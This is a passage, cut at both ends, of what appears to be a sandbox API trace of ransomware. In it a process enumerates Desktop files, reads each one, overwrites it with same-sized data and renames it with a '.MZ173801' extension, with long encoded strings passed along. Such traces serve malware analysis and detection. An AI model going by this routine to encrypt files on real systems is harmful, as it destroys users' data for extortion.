lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0123.119] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.119] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.119] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c0cd140, ftCreationTime.dwHighDateTime=0x1d5e367, ftLastAccessTime.dwLowDateTime=0x5a5ce960, ftLastAccessTime.dwHighDateTime=0x1d5efe7, ftLastWriteTime.dwLowDateTime=0x5a5ce960, ftLastWriteTime.dwHighDateTime=0x1d5efe7, nFileSizeHigh=0x0, nFileSizeLow=0xe19b, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="DX WjoqZK9o.m4a", cAlternateFileName="DXWJOQ~1.M4A")) returned 1 [0123.119] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.119] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.119] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\DX WjoqZK9o.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\dx wjoqzk9o.m4a"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c0cd140, ftCreationTime.dwHighDateTime=0x1d5e367, ftLastAccessTime.dwLowDateTime=0x5a5ce960, ftLastAccessTime.dwHighDateTime=0x1d5efe7, ftLastWriteTime.dwLowDateTime=0x5a5ce960, ftLastWriteTime.dwHighDateTime=0x1d5efe7, nFileSizeHigh=0x0, nFileSizeLow=0xe19b)) returned 1 [0123.120] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.120] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.120] GetCurrentThreadId () returned 0x1358 [0123.120] GetCurrentThreadId () returned 0x1358 [0123.120] GetCurrentThreadId () returned 0x1358 [0123.121] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.121] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.121] GetCurrentThreadId () returned 0x1358 [0123.121] GetCurrentThreadId () returned 0x1358 [0123.121] GetCurrentThreadId () returned 0x1358 [0123.121] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\DX WjoqZK9o.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\dx wjoqzk9o.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.121] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.121] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.121] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0xe19b [0123.121] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.121] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xe19b, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0xe19b, lpOverlapped=0x0) returned 1 [0123.122] CloseHandle (hObject=0x410) returned 1 [0123.123] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\DX WjoqZK9o.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\dx wjoqzk9o.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.125] WriteFile (in: hFile=0x410, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xe19b, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0xe19b, lpOverlapped=0x0) returned 1 [0123.126] CloseHandle (hObject=0x410) returned 1 [0123.126] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\DX WjoqZK9o.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\dx wjoqzk9o.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\DX WjoqZK9o.m4a.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\dx wjoqzk9o.m4a.mz173801")) returned 1 [0123.127] GetCurrentThreadId () returned 0x1358 [0123.127] GetCurrentThreadId () returned 0x1358 [0123.127] GetCurrentThreadId () returned 0x1358 [0123.127] GetCurrentThreadId () returned 0x1358 [0123.127] GetCurrentThreadId () returned 0x1358 [0123.127] GetCurrentThreadId () returned 0x1358 [0123.127] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0985040, ftCreationTime.dwHighDateTime=0x1d5ecde, ftLastAccessTime.dwLowDateTime=0x73059b00, ftLastAccessTime.dwHighDateTime=0x1d5e23c, ftLastWriteTime.dwLowDateTime=0x73059b00, ftLastWriteTime.dwHighDateTime=0x1d5e23c, nFileSizeHigh=0x0, nFileSizeLow=0xe120, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="f7Dp_pgi57G6wvUm.mkv", cAlternateFileName="F7DP_P~1.MKV")) returned 1 [0123.127] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.127] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.127] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\f7Dp_pgi57G6wvUm.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\f7dp_pgi57g6wvum.mkv"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0985040, ftCreationTime.dwHighDateTime=0x1d5ecde, ftLastAccessTime.dwLowDateTime=0x73059b00, ftLastAccessTime.dwHighDateTime=0x1d5e23c, ftLastWriteTime.dwLowDateTime=0x73059b00, ftLastWriteTime.dwHighDateTime=0x1d5e23c, nFileSizeHigh=0x0, nFileSizeLow=0xe120)) returned 1 [0123.128] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.128] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.128] GetCurrentThreadId () returned 0x1358 [0123.128] GetCurrentThreadId () returned 0x1358 [0123.128] GetCurrentThreadId () returned 0x1358 [0123.128] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.128] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.129] GetCurrentThreadId () returned 0x1358 [0123.129] GetCurrentThreadId () returned 0x1358 [0123.129] GetCurrentThreadId () returned 0x1358 [0123.129] CreateFileW 